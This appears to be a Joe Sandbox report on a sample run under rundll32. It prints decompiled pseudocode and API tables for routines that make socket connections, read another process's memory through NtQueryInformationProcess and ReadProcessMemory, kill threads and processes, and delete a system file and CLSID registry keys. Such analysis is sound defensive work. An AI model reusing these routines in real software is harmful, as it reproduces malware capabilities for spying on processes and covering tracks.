                                                            								L5:
                                                            								return 0;
                                                            							} else {
                                                            								__imp__#111();
                                                            								if(_t152 == 0x2733) {
                                                            									goto L13;
                                                            								} else {
                                                            									goto L5;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				L72:
                                                            			}

















































                                                            0x0464dca1
                                                            0x0464dca5
                                                            0x0464dca7
                                                            0x0464dcac
                                                            0x0464dd0c
                                                            0x0464dd19
                                                            0x0464dd1d
                                                            0x0464dd25
                                                            0x0464dd2b
                                                            0x0464dd2e
                                                            0x00000000
                                                            0x0464dd30
                                                            0x0464dd38
                                                            0x0464dd3e
                                                            0x0464dd41
                                                            0x00000000
                                                            0x0464dd43
                                                            0x0464dd43
                                                            0x0464dd4c
                                                            0x0464dd53
                                                            0x0464dd5d
                                                            0x0464dd60
                                                            0x0464dd63
                                                            0x0464dd8d
                                                            0x0464dd93
                                                            0x0464dd96
                                                            0x00000000
                                                            0x0464dd98
                                                            0x0464dd98
                                                            0x0464dd9e
                                                            0x0464dda3
                                                            0x00000000
                                                            0x0464dda5
                                                            0x0464dda5
                                                            0x0464dda7
                                                            0x0464ddbb
                                                            0x0464ddc0
                                                            0x0464ddc1
                                                            0x0464ddc2
                                                            0x0464ddc3
                                                            0x0464ddc4
                                                            0x0464ddc5
                                                            0x0464ddc6
                                                            0x0464ddc7
                                                            0x0464ddc8
                                                            0x0464ddc9
                                                            0x0464ddca
                                                            0x0464ddcb
                                                            0x0464ddcc
                                                            0x0464ddcd
                                                            0x0464ddce
                                                            0x0464ddcf
                                                            0x0464ddd0
                                                            0x0464ddd1
                                                            0x0464ddd2
                                                            0x0464ddd3
                                                            0x0464ddd4
                                                            0x0464ddd5
                                                            0x0464ddd6
                                                            0x0464ddd7
                                                            0x0464ddd8
                                                            0x0464ddd9
                                                            0x0464ddda
                                                            0x0464dddb
                                                            0x0464dddc
                                                            0x0464dddd
                                                            0x0464ddde
                                                            0x0464dddf
                                                            0x0464dde1
                                                            0x0464dde3
                                                            0x0464dde6
                                                            0x0464dded
                                                            0x0464ddf9
                                                            0x0464ddfc
                                                            0x0464de05
                                                            0x0464de0b
                                                            0x0464de0f
                                                            0x0464de16
                                                            0x0464de25
                                                            0x0464de25
                                                            0x0464de25
                                                            0x0464de18
                                                            0x0464de18
                                                            0x0464de1c
                                                            0x00000000
                                                            0x0464de1e
                                                            0x0464de1e
                                                            0x0464de1e
                                                            0x0464de1c
                                                            0x0464de2b
                                                            0x0464de34
                                                            0x0464de36
                                                            0x0464de36
                                                            0x0464de39
                                                            0x0464de3c
                                                            0x0464de3f
                                                            0x0464de41
                                                            0x0464de43
                                                            0x0464de43
                                                            0x0464de44
                                                            0x0464de44
                                                            0x0464de4a
                                                            0x0464de52
                                                            0x0464de54
                                                            0x0464de56
                                                            0x0464de59
                                                            0x0464de61
                                                            0x0464de6a
                                                            0x0464de73
                                                            0x0464de76
                                                            0x0464de7b
                                                            0x0464de7e
                                                            0x0464deeb
                                                            0x0464deeb
                                                            0x0464deed
                                                            0x0464deef
                                                            0x0464deef
                                                            0x0464def5
                                                            0x0464def8
                                                            0x0464defb
                                                            0x0464defd
                                                            0x0464df00
                                                            0x0464df05
                                                            0x0464df08
                                                            0x0464df0f
                                                            0x0464df16
                                                            0x0464df16
                                                            0x0464df23
                                                            0x0464df26
                                                            0x0464df2d
                                                            0x0464df2f
                                                            0x0464df32
                                                            0x0464df34
                                                            0x0464e034
                                                            0x0464e03d
                                                            0x0464e03f
                                                            0x0464e045
                                                            0x0464e049
                                                            0x0464e04d
                                                            0x0464e04f
                                                            0x0464e052
                                                            0x0464e054
                                                            0x0464e058
                                                            0x0464e05a
                                                            0x0464e05a
                                                            0x0464e054
                                                            0x0464e05d
                                                            0x0464e063
                                                            0x0464e065
                                                            0x0464e083
                                                            0x0464e08e
                                                            0x0464e098
                                                            0x0464e067
                                                            0x0464e067
                                                            0x0464e069
                                                            0x0464e06b
                                                            0x0464e078
                                                            0x0464e078
                                                            0x0464e07b
                                                            0x00000000
                                                            0x0464e06d
                                                            0x0464e06e
                                                            0x0464e074
                                                            0x0464e076
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464e076
                                                            0x0464e06b
                                                            0x0464df3a
                                                            0x0464df3a
                                                            0x0464df40
                                                            0x0464df4a
                                                            0x0464df50
                                                            0x0464df52
                                                            0x0464df65
                                                            0x0464df68
                                                            0x0464df7b
                                                            0x0464df7e
                                                            0x0464e02d
                                                            0x00000000
                                                            0x0464df84
                                                            0x0464df84
                                                            0x0464df87
                                                            0x0464df9a
                                                            0x0464df9d
                                                            0x0464dfb6
                                                            0x0464dfb9
                                                            0x0464e004
                                                            0x0464e007
                                                            0x00000000
                                                            0x0464e00d
                                                            0x0464e00d
                                                            0x0464e013
                                                            0x0464e01a
                                                            0x0464e021
                                                            0x0464e024
                                                            0x00000000
                                                            0x0464e024
                                                            0x0464dfbb
                                                            0x00000000
                                                            0x0464dfbb
                                                            0x0464df9f
                                                            0x0464df9f
                                                            0x0464dfa5
                                                            0x0464dfbd
                                                            0x0464dfbf
                                                            0x0464dfc5
                                                            0x0464dfc7
                                                            0x0464dfda
                                                            0x0464dfe0
                                                            0x0464dfe2
                                                            0x0464dfee
                                                            0x0464dff5
                                                            0x0464dff8
                                                            0x0464dffb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464dfa7
                                                            0x0464dfa7
                                                            0x0464dfac
                                                            0x0464dfae
                                                            0x00000000
                                                            0x0464dfb4
                                                            0x00000000
                                                            0x0464dfb4
                                                            0x0464dfae
                                                            0x0464dfa5
                                                            0x0464df89
                                                            0x0464df8b
                                                            0x0464df90
                                                            0x0464df92
                                                            0x00000000
                                                            0x0464df98
                                                            0x00000000
                                                            0x0464df98
                                                            0x0464df92
                                                            0x0464df87
                                                            0x0464df6a
                                                            0x0464df6c
                                                            0x0464df71
                                                            0x0464df73
                                                            0x00000000
                                                            0x0464df79
                                                            0x00000000
                                                            0x0464df79
                                                            0x0464df73
                                                            0x0464df54
                                                            0x0464df56
                                                            0x0464df5b
                                                            0x0464df5d
                                                            0x00000000
                                                            0x0464df63
                                                            0x00000000
                                                            0x0464df63
                                                            0x0464df5d
                                                            0x00000000
                                                            0x0464dfc9
                                                            0x0464dfcb
                                                            0x0464dfcd
                                                            0x0464dfd0
                                                            0x0464dfd0
                                                            0x00000000
                                                            0x0464dfd8
                                                            0x0464de80
                                                            0x0464de81
                                                            0x0464de86
                                                            0x0464de89
                                                            0x0464de91
                                                            0x0464de97
                                                            0x0464de9d
                                                            0x0464de9f
                                                            0x0464dea1
                                                            0x0464e09b
                                                            0x0464e0a0
                                                            0x0464e0a5
                                                            0x0464e0a5
                                                            0x0464e0aa
                                                            0x0464e0af
                                                            0x0464e0af
                                                            0x0464e0b4
                                                            0x0464e0b9
                                                            0x0464e0ba
                                                            0x0464e0bb
                                                            0x0464e0bc
                                                            0x0464e0bd
                                                            0x0464e0be
                                                            0x0464e0bf
                                                            0x0464e0c0
                                                            0x0464e0c1
                                                            0x0464e0c6
                                                            0x0464e0cc
                                                            0x0464e0d2
                                                            0x0464e0d4
                                                            0x0464e0ff
                                                            0x0464e105
                                                            0x0464e108
                                                            0x0464e137
                                                            0x0464e13d
                                                            0x0464e10a
                                                            0x0464e10a
                                                            0x0464e110
                                                            0x0464e115
                                                            0x00000000
                                                            0x0464e117
                                                            0x0464e117
                                                            0x0464e119
                                                            0x00000000
                                                            0x0464e11b
                                                            0x0464e11b
                                                            0x0464e11e
                                                            0x0464e120
                                                            0x0464e127
                                                            0x0464e12e
                                                            0x0464e136
                                                            0x0464e136
                                                            0x0464e119
                                                            0x0464e115
                                                            0x0464e0d6
                                                            0x0464e0d6
                                                            0x0464e0dd
                                                            0x0464e0df
                                                            0x0464e0e6
                                                            0x0464e0ed
                                                            0x0464e0f5
                                                            0x0464e0f5
                                                            0x0464dea7
                                                            0x0464dea7
                                                            0x0464deaf
                                                            0x0464deb4
                                                            0x0464deb6
                                                            0x0464debd
                                                            0x0464debd
                                                            0x0464dec7
                                                            0x0464deca
                                                            0x0464ded0
                                                            0x0464ded5
                                                            0x0464dedb
                                                            0x0464dee0
                                                            0x0464dee3
                                                            0x0464dee6
                                                            0x00000000
                                                            0x0464dee6
                                                            0x0464dea1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464dda7
                                                            0x0464dda3
                                                            0x0464dd65
                                                            0x0464dd65
                                                            0x0464dd6b
                                                            0x0464dd72
                                                            0x0464dd76
                                                            0x0464dd81
                                                            0x0464dd81
                                                            0x0464dd63
                                                            0x0464dd41
                                                            0x0464dcae
                                                            0x0464dcb6
                                                            0x0464dcbf
                                                            0x0464ddae
                                                            0x0464ddb3
                                                            0x0464dcc5
                                                            0x0464dcc5
                                                            0x0464dcd6
                                                            0x0464dcde
                                                            0x0464dce6
                                                            0x0464dda9
                                                            0x0464dda9
                                                            0x00000000
                                                            0x0464dcec
                                                            0x0464dcef
                                                            0x0464dd02
                                                            0x0464dd09
                                                            0x0464dcf1
                                                            0x0464dcf1
                                                            0x0464dcfc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464dcfc
                                                            0x0464dcef
                                                            0x0464dce6
                                                            0x0464dcbf
                                                            0x00000000

                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 0464DCB6
                                                            • connect.WS2_32(?,?,00000010), ref: 0464DCDE
                                                            • WSAGetLastError.WS2_32(?,74CB4D40,?,0464D884,?,00000005), ref: 0464DCF1
                                                            • connect.WS2_32(?,?,00000010), ref: 0464DD25
                                                            • WSAEventSelect.WS2_32(?,?,00000023), ref: 0464DD38
                                                            • SetLastError.KERNEL32(00000000,?,74CB4D40,?,0464D884,?,00000005), ref: 0464DD53
                                                            • GetLastError.KERNEL32(?,74CB4D40,?,0464D884,?,00000005), ref: 0464DD65
                                                            • WSASetLastError.WS2_32(00000000,?,74CB4D40,?,0464D884,?,00000005), ref: 0464DD76
                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 0464DD8D
                                                            • WSAGetLastError.WS2_32(?,74CB4D40,?,0464D884,?,00000005), ref: 0464DD98
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464DDFC
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464DE00
                                                            • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0464DE97
                                                            • SetWaitableTimer.KERNEL32(00000000,?,?,00000000,00000000,00000000), ref: 0464DED5
                                                            • WSAWaitForMultipleEvents.WS2_32(?,?,00000000,000000FF,00000000,?,00000000,?,74CB4C30), ref: 0464DF4A
                                                            • GetLastError.KERNEL32(?,00000000,?,74CB4C30), ref: 0464DFDA
                                                            • WSAGetLastError.WS2_32(?,00000000,?,74CB4C30), ref: 0464E00D
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464E036
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464E05D
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,74CB4C30), ref: 0464E06E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CurrentThread$EventSelectTimerWaitableconnect$CloseCreateEventsHandleMultipleWaitsend
                                                            • String ID:
                                                            • API String ID: 2019364350-0
                                                            • Opcode ID: 24ffd4cd018eb31a665a29f9f083947bbe2c8460ed7bfb1f11420178a25c9af3
                                                            • Instruction ID: 4da8f091577d8bf4d8ecafb1ee5a9f4eb6c8934583ec6d58cd87afcd6bc0e655
                                                            • Opcode Fuzzy Hash: 24ffd4cd018eb31a665a29f9f083947bbe2c8460ed7bfb1f11420178a25c9af3
                                                            • Instruction Fuzzy Hash: 20C1BF70B00205AFEF249F64D848B6AB7A5FF94715F244229E519CB7C0FB76E811CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E04636060(void* __ebx, intOrPtr* __ecx, long __edx, void* __edi, void* __esi) {
                                                            				signed int _v12;
                                                            				intOrPtr _v16;
                                                            				DWORD* _v20;
                                                            				DWORD* _v36;
                                                            				void* _v44;
                                                            				signed int _v48;
                                                            				void _v112;
                                                            				void* _v568;
                                                            				void _v584;
                                                            				DWORD* _v588;
                                                            				DWORD* _v592;
                                                            				void* _v612;
                                                            				char _v616;
                                                            				signed int _t46;
                                                            				void* _t49;
                                                            				_Unknown_base(*)()* _t51;
                                                            				_Unknown_base(*)()* _t53;
                                                            				struct HINSTANCE__* _t54;
                                                            				signed int _t55;
                                                            				signed int _t59;
                                                            				signed int _t61;
                                                            				signed int _t80;
                                                            				void* _t90;
                                                            				intOrPtr _t104;
                                                            				intOrPtr* _t118;
                                                            				void* _t120;
                                                            				void* _t122;
                                                            				signed int _t123;
                                                            
                                                            				_t46 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t46 ^ _t123;
                                                            				_t118 = __ecx;
                                                            				_t90 = OpenProcess(0x1fffff, 0, __edx);
                                                            				_t49 = GetCurrentProcess();
                                                            				_t120 = LoadLibraryA;
                                                            				_v588 = _t49;
                                                            				_v592 = 0;
                                                            				_t51 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                            				if(_t51 != 0) {
                                                            					 *_t51(_v588,  &_v592);
                                                            				}
                                                            				_v588 = 0;
                                                            				_t53 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                            				if(_t53 != 0) {
                                                            					 *_t53(_t90,  &_v588);
                                                            				}
                                                            				if(_v592 != 1 || _v588 != 0) {
                                                            					_t54 = GetModuleHandleA("ntdll.dll");
                                                            					__eflags = _t54;
                                                            					if(_t54 != 0) {
                                                            						L9:
                                                            						_t55 = GetProcAddress(_t54, "NtQueryInformationProcess");
                                                            						__eflags = _t55;
                                                            						if(_t55 == 0) {
                                                            							goto L18;
                                                            						} else {
                                                            							_t59 =  *_t55(_t90, 0,  &_v616, 0x18, 0);
                                                            							__eflags = _t59;
                                                            							if(_t59 < 0) {
                                                            								goto L18;
                                                            							} else {
                                                            								_t61 = ReadProcessMemory(_t90, _v612,  &_v584, 0x1d8, 0);
                                                            								__eflags = _t61;
                                                            								if(_t61 == 0) {
                                                            									goto L18;
                                                            								} else {
                                                            									__eflags = ReadProcessMemory(_t90, _v568,  &_v112, 0x48, 0);
                                                            									if(__eflags == 0) {
                                                            										goto L18;
                                                            									} else {
                                                            										_push( ~(__eflags > 0) | ((_v48 & 0x0000ffff) + 0x00000001) * 0x00000002);
                                                            										_t122 = L04655B55( ~(__eflags > 0) | ((_v48 & 0x0000ffff) + 0x00000001) * 0x00000002, ReadProcessMemory, __eflags);
                                                            										E0465DEA0(_t118, _t122, 0, 2 + (_v48 & 0x0000ffff) * 2);
                                                            										ReadProcessMemory(_t90, _v44, _t122, _v48 & 0x0000ffff, 0);
                                                            										E046331B0( &_v36, _t118, _t122);
                                                            										L04655B0F(_t122);
                                                            										 *((intOrPtr*)(_t118 + 0x14)) = 7;
                                                            										 *(_t118 + 0x10) = 0;
                                                            										 *_t118 = 0;
                                                            										_t104 = _v16;
                                                            										__eflags = _t104 - 8;
                                                            										if(_t104 >= 8) {
                                                            											 *_t118 = _v36;
                                                            											_v36 = 0;
                                                            										} else {
                                                            											_t80 =  &(_v20[0]);
                                                            											__eflags = _t80;
                                                            											if(_t80 != 0) {
                                                            												E0465D060(_t118,  &_v36, _t80 + _t80);
                                                            												_t104 = _v16;
                                                            											}
                                                            										}
                                                            										 *(_t118 + 0x10) = _v20;
                                                            										 *((intOrPtr*)(_t118 + 0x14)) = _t104;
                                                            										_v16 = 7;
                                                            										_v20 = 0;
                                                            										_v36 = 0;
                                                            										E04633170( &_v36);
                                                            										__eflags = _v12 ^ _t123;
                                                            										return E04655AFE(_v12 ^ _t123);
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					} else {
                                                            						_t54 = LoadLibraryA("ntdll.dll");
                                                            						__eflags = _t54;
                                                            						if(_t54 == 0) {
                                                            							L18:
                                                            							E046331B0(_t118, _t118, 0x467c5d0);
                                                            							__eflags = _v12 ^ _t123;
                                                            							return E04655AFE(_v12 ^ _t123);
                                                            						} else {
                                                            							goto L9;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					E04635DA0(_t90, _t118, _t90, _t118, _t120);
                                                            					return E04655AFE(_v12 ^ _t123);
                                                            				}
                                                            			}































                                                            0x04636069
                                                            0x04636070
                                                            0x0463607e
                                                            0x04636086
                                                            0x04636088
                                                            0x0463608e
                                                            0x0463609e
                                                            0x046360a4
                                                            0x046360b1
                                                            0x046360b9
                                                            0x046360c8
                                                            0x046360c8
                                                            0x046360d4
                                                            0x046360e1
                                                            0x046360e9
                                                            0x046360f3
                                                            0x046360f3
                                                            0x046360fc
                                                            0x04636128
                                                            0x0463612e
                                                            0x04636130
                                                            0x04636141
                                                            0x04636147
                                                            0x0463614d
                                                            0x0463614f
                                                            0x00000000
                                                            0x04636155
                                                            0x04636163
                                                            0x04636165
                                                            0x04636167
                                                            0x00000000
                                                            0x0463616d
                                                            0x04636188
                                                            0x0463618a
                                                            0x0463618c
                                                            0x00000000
                                                            0x04636192
                                                            0x046361a3
                                                            0x046361a5
                                                            0x00000000
                                                            0x046361ab
                                                            0x046361c0
                                                            0x046361cd
                                                            0x046361da
                                                            0x046361ee
                                                            0x046361f8
                                                            0x046361fe
                                                            0x04636205
                                                            0x0463620c
                                                            0x04636216
                                                            0x04636219
                                                            0x0463621c
                                                            0x0463621f
                                                            0x04636241
                                                            0x04636243
                                                            0x04636221
                                                            0x04636224
                                                            0x04636224
                                                            0x04636227
                                                            0x04636231
                                                            0x04636236
                                                            0x04636239
                                                            0x04636227
                                                            0x0463624d
                                                            0x04636252
                                                            0x04636258
                                                            0x0463625f
                                                            0x04636266
                                                            0x0463626a
                                                            0x04636277
                                                            0x04636281
                                                            0x04636281
                                                            0x046361a5
                                                            0x0463618c
                                                            0x04636167
                                                            0x04636132
                                                            0x04636137
                                                            0x04636139
                                                            0x0463613b
                                                            0x04636282
                                                            0x04636289
                                                            0x04636295
                                                            0x046362a0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463613b
                                                            0x04636107
                                                            0x0463610b
                                                            0x04636122
                                                            0x04636122

                                                            APIs
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000), ref: 04636080
                                                            • GetCurrentProcess.KERNEL32 ref: 04636088
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 046360AE
                                                            • GetProcAddress.KERNEL32(00000000), ref: 046360B1
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 046360DE
                                                            • GetProcAddress.KERNEL32(00000000), ref: 046360E1
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04636128
                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04636137
                                                            • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 04636147
                                                            • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000), ref: 04636188
                                                            • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000), ref: 046361A1
                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 046361EE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$AddressLibraryLoadMemoryProcRead$CurrentHandleModuleOpen
                                                            • String ID: IsWow64Process$NtQueryInformationProcess$kernel32.dll$ntdll.dll
                                                            • API String ID: 4184825023-3205649337
                                                            • Opcode ID: 781c16d589af7d2f5cae33aa9baaebfe6fe7ee31b0194206ca7d52b6cc4c5441
                                                            • Instruction ID: 65b7c8b5b9fbdf34fea195a033a46689f9db40afc98dec3810e7382b188e3910
                                                            • Opcode Fuzzy Hash: 781c16d589af7d2f5cae33aa9baaebfe6fe7ee31b0194206ca7d52b6cc4c5441
                                                            • Instruction Fuzzy Hash: 0651A371B01219BBDB249FA4DC4DBAE7778EF44705F000169E90AA6290FF78B944CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04643E90(intOrPtr* __ecx) {
                                                            				void* _t24;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				void* _t27;
                                                            				int _t36;
                                                            				intOrPtr* _t42;
                                                            
                                                            				_t42 = __ecx;
                                                            				 *__ecx = 0x467eda4;
                                                            				TerminateThread( *(__ecx + 0x24), 0);
                                                            				TerminateProcess( *(_t42 + 0x1c), 0);
                                                            				TerminateThread( *(_t42 + 0x20), 0);
                                                            				WaitForSingleObject( *(_t42 + 0x28), 0x7d0);
                                                            				TerminateThread( *(_t42 + 0x28), 0);
                                                            				_t24 =  *(_t42 + 0xc);
                                                            				if(_t24 != 0) {
                                                            					DisconnectNamedPipe(_t24);
                                                            				}
                                                            				_t25 =  *(_t42 + 0x10);
                                                            				if(_t25 != 0) {
                                                            					DisconnectNamedPipe(_t25);
                                                            				}
                                                            				_t26 =  *(_t42 + 0x14);
                                                            				if(_t26 != 0) {
                                                            					DisconnectNamedPipe(_t26);
                                                            				}
                                                            				_t27 =  *(_t42 + 0x18);
                                                            				if(_t27 != 0) {
                                                            					DisconnectNamedPipe(_t27);
                                                            				}
                                                            				CloseHandle( *(_t42 + 0xc));
                                                            				CloseHandle( *(_t42 + 0x10));
                                                            				CloseHandle( *(_t42 + 0x14));
                                                            				CloseHandle( *(_t42 + 0x18));
                                                            				CloseHandle( *(_t42 + 0x1c));
                                                            				CloseHandle( *(_t42 + 0x20));
                                                            				CloseHandle( *(_t42 + 0x28));
                                                            				CloseHandle( *(_t42 + 0x24));
                                                            				 *_t42 = 0x467e8b0;
                                                            				_t36 = CloseHandle( *(_t42 + 8));
                                                            				 *_t42 = 0x467e8c0;
                                                            				return _t36;
                                                            			}









                                                            0x04643e98
                                                            0x04643e9f
                                                            0x04643ea5
                                                            0x04643eac
                                                            0x04643eb7
                                                            0x04643ec1
                                                            0x04643ecc
                                                            0x04643ece
                                                            0x04643ed9
                                                            0x04643edc
                                                            0x04643edc
                                                            0x04643ede
                                                            0x04643ee3
                                                            0x04643ee6
                                                            0x04643ee6
                                                            0x04643ee8
                                                            0x04643eed
                                                            0x04643ef0
                                                            0x04643ef0
                                                            0x04643ef2
                                                            0x04643ef7
                                                            0x04643efa
                                                            0x04643efa
                                                            0x04643f05
                                                            0x04643f0a
                                                            0x04643f0f
                                                            0x04643f14
                                                            0x04643f19
                                                            0x04643f1e
                                                            0x04643f23
                                                            0x04643f28
                                                            0x04643f2d
                                                            0x04643f33
                                                            0x04643f35
                                                            0x04643f3d

                                                            APIs
                                                            • TerminateThread.KERNEL32(?,00000000,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EA5
                                                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EAC
                                                            • TerminateThread.KERNEL32(?,00000000,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EB7
                                                            • WaitForSingleObject.KERNEL32(?,000007D0,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EC1
                                                            • TerminateThread.KERNEL32(?,00000000,?,00000000,046390F8,?,046878D8,00000000), ref: 04643ECC
                                                            • DisconnectNamedPipe.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EDC
                                                            • DisconnectNamedPipe.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EE6
                                                            • DisconnectNamedPipe.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EF0
                                                            • DisconnectNamedPipe.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EFA
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F05
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F0A
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F0F
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F14
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F19
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F1E
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F23
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F28
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F33
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$DisconnectNamedPipeTerminate$Thread$ObjectProcessSingleWait
                                                            • String ID:
                                                            • API String ID: 1450516946-0
                                                            • Opcode ID: f55e0c41e36b661597b90835c75e7cdf00f7960a9f8198499ab3f7307a2fdf38
                                                            • Instruction ID: 7e00d4f1627fc440b7d83c320cb7ea5f4a9ff7dbf96183eeee55481ff49bbe5b
                                                            • Opcode Fuzzy Hash: f55e0c41e36b661597b90835c75e7cdf00f7960a9f8198499ab3f7307a2fdf38
                                                            • Instruction Fuzzy Hash: 1D11DD31A0062ABBDB156F26DC09B06BFB9FF48760B144113B40892A60EB75F8B1DFD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E0463A830(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				short _v1128;
                                                            				void* _v1132;
                                                            				signed int _t22;
                                                            				void* _t50;
                                                            				signed int _t64;
                                                            				void* _t69;
                                                            
                                                            				_t69 = __eflags;
                                                            				_t63 = __esi;
                                                            				_t62 = __edi;
                                                            				_t22 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t22 ^ _t64;
                                                            				_t50 = __ecx;
                                                            				_push(0);
                                                            				E04646370(__ecx, L"winssyslog",  &_v608, __edi, __esi, 8);
                                                            				DeleteFileW( &_v608);
                                                            				E046378B0(_t50, L"Control", 0x1fffffff, __edi, __esi, _t69);
                                                            				E04646050(_t50, L"Global",  &_v88, __edi, __esi);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_v1132 = 0;
                                                            				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20106,  &_v1132) == 0) {
                                                            					SHDeleteKeyW(_v1132, 0x467c5d0);
                                                            					RegCloseKey(_v1132);
                                                            				}
                                                            				E04646050(_t50, L"Pg",  &_v88, _t62, _t63);
                                                            				wsprintfW( &_v1128, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_v1132 = 0;
                                                            				if(RegOpenKeyExW(0x80000002,  &_v1128, 0, 0x20106,  &_v1132) == 0) {
                                                            					SHDeleteKeyW(_v1132, 0x467c5d0);
                                                            					RegCloseKey(_v1132);
                                                            				}
                                                            				CreateEventA(0, 1, 0, _t50 + 0xc);
                                                            				return E04655AFE(_v8 ^ _t64);
                                                            			}












                                                            0x0463a830
                                                            0x0463a830
                                                            0x0463a830
                                                            0x0463a839
                                                            0x0463a840
                                                            0x0463a844
                                                            0x0463a84c
                                                            0x0463a855
                                                            0x0463a864
                                                            0x0463a874
                                                            0x0463a881
                                                            0x0463a896
                                                            0x0463a89f
                                                            0x0463a8cb
                                                            0x0463a8d8
                                                            0x0463a8e4
                                                            0x0463a8e4
                                                            0x0463a8f2
                                                            0x0463a907
                                                            0x0463a910
                                                            0x0463a93c
                                                            0x0463a949
                                                            0x0463a955
                                                            0x0463a955
                                                            0x0463a965
                                                            0x0463a979

                                                            APIs
                                                              • Part of subcall function 04646370: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04646396
                                                            • DeleteFileW.KERNEL32(?), ref: 0463A864
                                                              • Part of subcall function 046378B0: wsprintfW.USER32 ref: 046378DF
                                                              • Part of subcall function 046378B0: RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04637919
                                                              • Part of subcall function 046378B0: RegSetValueExW.ADVAPI32(?,0467E09C,00000000,00000004,?,00000004), ref: 0463793A
                                                              • Part of subcall function 046378B0: RegCloseKey.ADVAPI32(?), ref: 04637950
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
